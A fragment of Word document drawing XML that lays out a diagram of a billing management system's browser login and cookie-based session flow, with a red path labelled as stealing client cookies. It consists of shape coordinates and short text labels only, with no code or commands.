                                  <a:pt x="0" y="146919"/>
                                  <a:pt x="147338" y="0"/>
                                  <a:pt x="329159" y="0"/>
                                </a:cubicBezTo>
                                <a:close/>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:ln w="0" cap="sq">
                            <a:miter lim="127000"/>
                          </a:ln>
                        </wps:spPr>
                        <wps:style>
                          <a:lnRef idx="0">
                            <a:srgbClr val="000000">
                              <a:alpha val="0"/>
                            </a:srgbClr>
                          </a:lnRef>
                          <a:fillRef idx="1">
                            <a:srgbClr val="4672C4"/>
                          </a:fillRef>
                          <a:effectRef idx="0">
                            <a:scrgbClr r="0" g="0" b="0"/>
                          </a:effectRef>
                          <a:fontRef idx="none"/>
                        </wps:style>
                        <wps:bodyPr/>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1447" name="Shape 1447"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3732265" y="411451"/>
                            <a:ext cx="658202" cy="656330"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="658202" h="656330">
                                <a:moveTo>
                                  <a:pt x="0" y="328107"/>
                                </a:moveTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="146919"/>
                                  <a:pt x="147338" y="0"/>
                                  <a:pt x="329159" y="0"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="510864" y="0"/>
                                  <a:pt x="658202" y="146919"/>
                                  <a:pt x="658202" y="328107"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="658202" y="509411"/>
                                  <a:pt x="510864" y="656330"/>
                                  <a:pt x="329159" y="656330"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="147338" y="656330"/>
                                  <a:pt x="0" y="509411"/>
                                  <a:pt x="0" y="328107"/>
                                </a:cubicBezTo>
                                <a:close/>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:ln w="2894" cap="sq">
                            <a:miter lim="127000"/>
                          </a:ln>
                        </wps:spPr>
                        <wps:style>
                          <a:lnRef idx="1">
                            <a:srgbClr val="C8C8C8"/>
                          </a:lnRef>
                          <a:fillRef idx="0">
                            <a:srgbClr val="000000">
                              <a:alpha val="0"/>
                            </a:srgbClr>
                          </a:fillRef>
                          <a:effectRef idx="0">
                            <a:scrgbClr r="0" g="0" b="0"/>
                          </a:effectRef>
                          <a:fontRef idx="none"/>
                        </wps:style>
                        <wps:bodyPr/>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1448" name="Rectangle 1448"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3938352" y="586967"/>
                            <a:ext cx="359119" cy="125472"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="0A2CC7BD" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                              <w:proofErr w:type="spellStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:color w:val="FEFFFF"/>
                                  <w:sz w:val="15"/>
                                </w:rPr>
                                <w:t>Billiing</w:t>
                              </w:r>
                              <w:proofErr w:type="spellEnd"/>
                              <w:r>
                                <w:rPr>
                                  <w:color w:val="FEFFFF"/>
                                  <w:sz w:val="15"/>
                                </w:rPr>
                                <w:t xml:space="preserve"> </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1449" name="Rectangle 1449"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3809127" y="697893"/>
                            <a:ext cx="699169" cy="125863"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="140A87BC" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                              <w:r>
                                <w:rPr>
                                  <w:color w:val="FEFFFF"/>
                                  <w:sz w:val="15"/>
                                </w:rPr>
                                <w:t xml:space="preserve">Management </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1450" name="Rectangle 1450"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3926741" y="809487"/>
                            <a:ext cx="360849" cy="125472"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="486AD8CE" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                              <w:r>
                                <w:rPr>
                                  <w:color w:val="FEFFFF"/>
                                  <w:sz w:val="15"/>
                                </w:rPr>
                                <w:t>System</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1451" name="Rectangle 1451"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3771392" y="173069"/>
                            <a:ext cx="776795" cy="125472"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="5B5B3E0A" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                              <w:r>
                                <w:rPr>
                                  <w:color w:val="FFFFFF"/>
                                  <w:sz w:val="15"/>
                                </w:rPr>
                                <w:t>WEB BROWSER</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1452" name="Shape 1452"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1503158" y="739558"/>
                            <a:ext cx="2157586" cy="0"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="2157586">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="2157586" y="0"/>
                                </a:lnTo>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:ln w="11578" cap="rnd">
                            <a:round/>
                          </a:ln>
                        </wps:spPr>
                        <wps:style>
                          <a:lnRef idx="1">
                            <a:srgbClr val="4672C4"/>
                          </a:lnRef>
                          <a:fillRef idx="0">
                            <a:srgbClr val="000000">
                              <a:alpha val="0"/>
                            </a:srgbClr>
                          </a:fillRef>
                          <a:effectRef idx="0">
                            <a:scrgbClr r="0" g="0" b="0"/>
                          </a:effectRef>
                          <a:fontRef idx="none"/>
                        </wps:style>
                        <wps:bodyPr/>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1453" name="Shape 1453"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3650527" y="698806"/>
                            <a:ext cx="81738" cy="81506"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="81738" h="81506">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="81738" y="40753"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="81506"/>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49600" name="Shape 49600"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2295229" y="683988"/>
                            <a:ext cx="644977" cy="111143"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="644977" h="111143">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="644977" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="644977" y="111143"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="11114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55" name="Rectangle 1455"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2295113" y="697893"/>
                            <a:ext cx="863985" cy="125863"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="6942BEA5" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                              <w:r>
                                <w:rPr>
                                  <w:color w:val="3D64AC"/>
                                  <w:sz w:val="15"/>
                                </w:rPr>
                                <w:t>HTTP GET/LOGIN</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1456" name="Shape 1456"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1174116" y="165313"/>
                            <a:ext cx="2887308" cy="338874"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="2887308" h="338874">
                                <a:moveTo>
                                  <a:pt x="2887308" y="246138"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="2887308" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="338874"/>
                                </a:lnTo>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:ln w="11578" cap="rnd">
                            <a:round/>
                          </a:ln>
                        </wps:spPr>
                        <wps:style>
                          <a:lnRef idx="1">
                            <a:srgbClr val="4672C4"/>
                          </a:lnRef>
                          <a:fillRef idx="0">
                            <a:srgbClr val="000000">
                              <a:alpha val="0"/>
                            </a:srgbClr>
                          </a:fillRef>
                          <a:effectRef idx="0">
                            <a:scrgbClr r="0" g="0" b="0"/>
                          </a:effectRef>
                          <a:fontRef idx="none"/>
                        </wps:style>
                        <wps:bodyPr/>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1457" name="Shape 1457"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1133246" y="493999"/>
                            <a:ext cx="81738" cy="81506"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="81738" h="81506">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="81738" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="40869" y="81506"/>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459" name="Rectangle 1459"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2243214" y="122722"/>
                            <a:ext cx="777735" cy="125863"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="3D0AB464" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                              <w:r>
                                <w:rPr>
                                  <w:color w:val="3D64AC"/>
                                  <w:sz w:val="15"/>
                                  <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                                </w:rPr>
                                <w:t>AUTHENTICATE</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1460" name="Shape 1460"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1174116" y="975046"/>
                            <a:ext cx="2887308" cy="338875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="2887308" h="338875">
                                <a:moveTo>
                                  <a:pt x="2887308" y="92736"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="2887308" y="338875"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="338875"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="0"/>
                                </a:lnTo>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:ln w="11578" cap="rnd">
                            <a:round/>
                          </a:ln>
                        </wps:spPr>
                        <wps:style>
                          <a:lnRef idx="1">
                            <a:srgbClr val="4672C4"/>
                          </a:lnRef>
                          <a:fillRef idx="0">
                            <a:srgbClr val="000000">
                              <a:alpha val="0"/>
                            </a:srgbClr>
                          </a:fillRef>
                          <a:effectRef idx="0">
                            <a:scrgbClr r="0" g="0" b="0"/>
                          </a:effectRef>
                          <a:fontRef idx="none"/>
                        </wps:style>
                        <wps:bodyPr/>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1461" name="Shape 1461"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1133246" y="903728"/>
                            <a:ext cx="81738" cy="81506"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="81738" h="81506">
                                <a:moveTo>
                                  <a:pt x="40869" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="81738" y="81506"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="81506"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="40869"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49601" name="Shape 49601"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2244839" y="1258349"/>
                            <a:ext cx="581293" cy="111143"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="581293" h="111143">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="581293" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="581293" y="111143"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="11114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63" name="Rectangle 1463"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2244955" y="1272950"/>
                            <a:ext cx="773894" cy="125863"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="381C7FD3" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                              <w:r>
                                <w:rPr>
                                  <w:color w:val="3D64AC"/>
                                  <w:sz w:val="15"/>
                                </w:rPr>
                                <w:t>REPLY COOKIES</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1464" name="Shape 1464"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="433584" y="739558"/>
                            <a:ext cx="1689809" cy="1805030"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="1689809" h="1805030">
                                <a:moveTo>
                                  <a:pt x="411396" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="0" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="1805030"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1689809" y="1805030"/>
                                </a:lnTo>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:ln w="11578" cap="rnd">
                            <a:round/>
                          </a:ln>
                        </wps:spPr>
                        <wps:style>
                          <a:lnRef idx="1">
                            <a:srgbClr val="FF0000"/>
                          </a:lnRef>
                          <a:fillRef idx="0">
                            <a:srgbClr val="000000">
                              <a:alpha val="0"/>
                            </a:srgbClr>
                          </a:fillRef>
                          <a:effectRef idx="0">
                            <a:scrgbClr r="0" g="0" b="0"/>
                          </a:effectRef>
                          <a:fontRef idx="none"/>
                        </wps:style>
                        <wps:bodyPr/>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1465" name="Shape 1465"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2113176" y="2503836"/>
                            <a:ext cx="81738" cy="81505"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="81738" h="81505">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="81738" y="40753"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="81505"/>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466" name="Shape 1466"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="433584" y="739558"/>
                            <a:ext cx="1761330" cy="1805030"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="1761330" h="1805030">
                                <a:moveTo>
                                  <a:pt x="1761330" y="1805030"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="0" y="1805030"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="339875" y="0"/>
                                </a:lnTo>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:ln w="11578" cap="rnd">
                            <a:round/>
                          </a:ln>
                        </wps:spPr>
                        <wps:style>
                          <a:lnRef idx="1">
                            <a:srgbClr val="FF0000"/>
                          </a:lnRef>
                          <a:fillRef idx="0">
                            <a:srgbClr val="000000">
                              <a:alpha val="0"/>
                            </a:srgbClr>
                          </a:fillRef>
                          <a:effectRef idx="0">
                            <a:scrgbClr r="0" g="0" b="0"/>
                          </a:effectRef>
                          <a:fontRef idx="none"/>
                        </wps:style>
                        <wps:bodyPr/>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1467" name="Shape 1467"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="763242" y="698806"/>
                            <a:ext cx="81738" cy="81506"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="81738" h="81506">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="81738" y="40753"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="81506"/>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49602" name="Shape 49602"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2157" y="2259539"/>
                            <a:ext cx="862849" cy="111143"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="862849" h="111143">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="862849" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="862849" y="111143"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="11114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69" name="Rectangle 1469"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="2275599"/>
                            <a:ext cx="1144049" cy="125862"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="6E1FF819" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                              <w:r>
                                <w:rPr>
                                  <w:color w:val="3D64AC"/>
                                  <w:sz w:val="15"/>
                                </w:rPr>
                                <w:t>STEAL CLIENT COOKIES</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1471" name="Shape 1471"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="4148967" y="235473"/>
                            <a:ext cx="432493" cy="417601"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="432493" h="417601">
                                <a:moveTo>
                                  <a:pt x="0" y="199134"/>
                                </a:moveTo>
                                <a:cubicBezTo>
                                  <a:pt x="12656" y="83590"/>
                                  <a:pt x="116802" y="0"/>
                                  <a:pt x="232791" y="12504"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="348781" y="25007"/>
                                  <a:pt x="432493" y="128858"/>
                                  <a:pt x="419953" y="244517"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="411594" y="322203"/>
                                  <a:pt x="360740" y="388774"/>
                                  <a:pt x="287941" y="417601"/>
                                </a:cubicBezTo>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:ln w="11578" cap="rnd">
                            <a:round/>
                          </a:ln>
                        </wps:spPr>
                        <wps:style>
                          <a:lnRef idx="1">
                            <a:srgbClr val="4672C4"/>
                          </a:lnRef>
                          <a:fillRef idx="0">
                            <a:srgbClr val="000000">
                              <a:alpha val="0"/>
                            </a:srgbClr>
                          </a:fillRef>
                          <a:effectRef idx="0">
                            <a:scrgbClr r="0" g="0" b="0"/>
                          </a:effectRef>
                          <a:fontRef idx="none"/>
                        </wps:style>
                        <wps:bodyPr/>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1473" name="Shape 1473"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="4381758" y="619615"/>
                            <a:ext cx="70941" cy="62982"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="70941" h="62982">
                                <a:moveTo>
                                  <a:pt x="55266" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="70941" y="62982"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="47121"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="55266"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474" name="Rectangle 1474"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="4188791" y="0"/>
                            <a:ext cx="1408251" cy="125864"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="023DC55D" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                              <w:r>
                                <w:rPr>
                                  <w:color w:val="4672C4"/>
                                  <w:sz w:val="15"/>
                                </w:rPr>
                                <w:t xml:space="preserve">MATCH USER AND SESSION </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1475" name="Rectangle 1475"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="4411714" y="111709"/>
                            <a:ext cx="819662" cy="125471"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="3CDBC310" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                              <w:r>
                                <w:rPr>
                                  <w:color w:val="4672C4"/>
                                  <w:sz w:val="15"/>
                                </w:rPr>
                                <w:t xml:space="preserve">ID FROM TABLE </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1478" name="Shape 1478"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2762901" y="739559"/>
                            <a:ext cx="1874405" cy="1805030"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="1874405" h="1805030">
                                <a:moveTo>
                                  <a:pt x="0" y="1805030"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1874405" y="1805030"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1874405" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1699086" y="0"/>
                                </a:lnTo>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:ln w="11578" cap="rnd">
                            <a:round/>
                          </a:ln>
                        </wps:spPr>
                        <wps:style>
                          <a:lnRef idx="1">
                            <a:srgbClr val="FF0000"/>
                          </a:lnRef>
                          <a:fillRef idx="0">
                            <a:srgbClr val="000000">
                              <a:alpha val="0"/>
                            </a:srgbClr>
                          </a:fillRef>
                          <a:effectRef idx="0">
                            <a:scrgbClr r="0" g="0" b="0"/>
                          </a:effectRef>
                          <a:fontRef idx="none"/>
                        </wps:style>
